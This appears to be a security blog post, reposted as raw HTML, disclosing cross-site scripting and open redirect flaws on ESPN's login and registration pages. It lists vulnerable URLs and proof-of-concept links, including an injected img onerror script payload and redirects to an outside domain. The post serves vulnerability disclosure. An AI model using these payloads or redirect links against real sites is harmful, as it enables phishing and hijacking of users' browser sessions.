<a href="http://2.bp.blogspot.com/-ngmpdbJUJwY/VIb-dSEKSXI/AAAAAAAAAiA/D9V1TR42wmc/s1600/espn_games_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-ngmpdbJUJwY/VIb-dSEKSXI/AAAAAAAAAiA/D9V1TR42wmc/s1600/espn_games_xss1.png" width="400" /></span></a><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://espn.go.com/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px;">"ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.</span></span><br />
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px; text-align: justify;">ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.</span><span style="line-height: 19.7037048339844px; text-align: justify;">"(Wikipedia)</span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://espn.go.com/" target="_blank">Espn.go.com</a> has a cyber security bug problem. It is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities are very dangerous. Since they happen at ESPN's "login" & "register" pages that are credible. Attackers can abuse those links to mislead ESPN's users. The success rate of attacks may be high.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">During the tests, besides the links given above, large number of ESPN's links are vulnerable to those attacks.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The programming code flaw occurs at "espn.go.com"'s "login?" & "register" pages with "redirect" parameter, i.e.</span></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=</span></a></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com</span></a></div>
<div>
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=</span></a></div>
<div>
<a href="https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?regFormId=<wbr></wbr>espn&appRedirect=http://<wbr></wbr>register.go.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 8.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" />Disclosed by:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/546910247650996224" style="line-height: 17.8181819915772px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span><br />
<div style="line-height: 17.8181819915772px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and Open Redirect vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) XSS Web Security Vulnerability</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results</span><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</span></a></div>
<div>
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=http%<wbr></wbr>3A%2F%2Fgames.espn.go.com%<wbr></wbr>2Fworld-cup-bracket-linkedin-<wbr></wbr>predictor%2Fvk%2F2014%2Fes%<wbr></wbr>2Fgame%3Famazon%3Dcreate</span></a></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageNamepaypal%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=reddit</span></a></div>
<div>
<a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/<wbr></wbr>YourYahooAccount/login</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2Fyandex%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</a><wbr></wbr>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn" target="_blank">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageName%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=espn</a>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate" target="_blank">http://games.espn.go.com/nfl-<wbr></wbr>gridiron-challenge/2014/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fgames.espn.go.com%2Fnfl-<wbr></wbr>gridiron-challenge%2Febay2014%<wbr></wbr>2Ffacebookesgame%3Fstep%<wbr></wbr>3Dcreate</a>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login" target="_blank">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/YourAccount/<wbr></wbr>login</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be</a></span></div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-KexrC5W0nTE/VIb-cXtU22I/AAAAAAAAAhw/j894VKHloJU/s1600/espn_go_r_xss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-KexrC5W0nTE/VIb-cXtU22I/AAAAAAAAAhw/j894VKHloJU/s1600/espn_go_r_xss2.png" width="400" /></span></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-i3uwX5jggI0/VIb-dOTjACI/AAAAAAAAAh0/9T32eJq4ZVE/s1600/espn_go_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-i3uwX5jggI0/VIb-dOTjACI/AAAAAAAAAh0/9T32eJq4ZVE/s1600/espn_go_xss.png" width="400" /></span></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-dPv6WEhPNLE/VIb-duCcbLI/AAAAAAAAAh8/HcWnDgx_tbI/s1600/espn_register_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-dPv6WEhPNLE/VIb-duCcbLI/AAAAAAAAAh8/HcWnDgx_tbI/s1600/espn_register_xss1.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Dest Redirect Privilege Escalation Vulnerability Web Security Vulnerability</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="https://computerpitch.wordpress.com/">https://computerpitch.wordpress.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) Login Page </b><b> Dest Redirect Privilege Escalation Vulnerability</b></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%<wbr></wbr>2FAndroidOfficial</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2f%<wbr></wbr>2fdiebiyi.com</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fpages%<wbr></wbr>2Fwwwgooglecom%<wbr></wbr>2Fyahoo101882723190828</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2.2) Vulnerabilities Attacked without User Login</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FAdcash%<wbr></wbr>2Flinkedinstatus%2Febay%2Falibaba%<wbr></wbr>2F539770783556698112</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com" target="_blank">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</a>?</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">This vulnerability was used to demonstrate "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" of Facebook,</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></div>
<div>
<a href="https://www.youtube.com/watch?v=HUE8VbbwUms" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=HUE8VbbwUms</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></div>
<div>
<a href="http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/<wbr></wbr>covert-redirect/covert-<wbr></wbr>redirect-vulnerability-<wbr></wbr>related-to-oauth-2-0-and-<wbr></wbr>openid/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2Freddit%2Fbing%<wbr></wbr>2Ftmallstatus%<wbr></wbr>2Ftmall541002332331606017</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
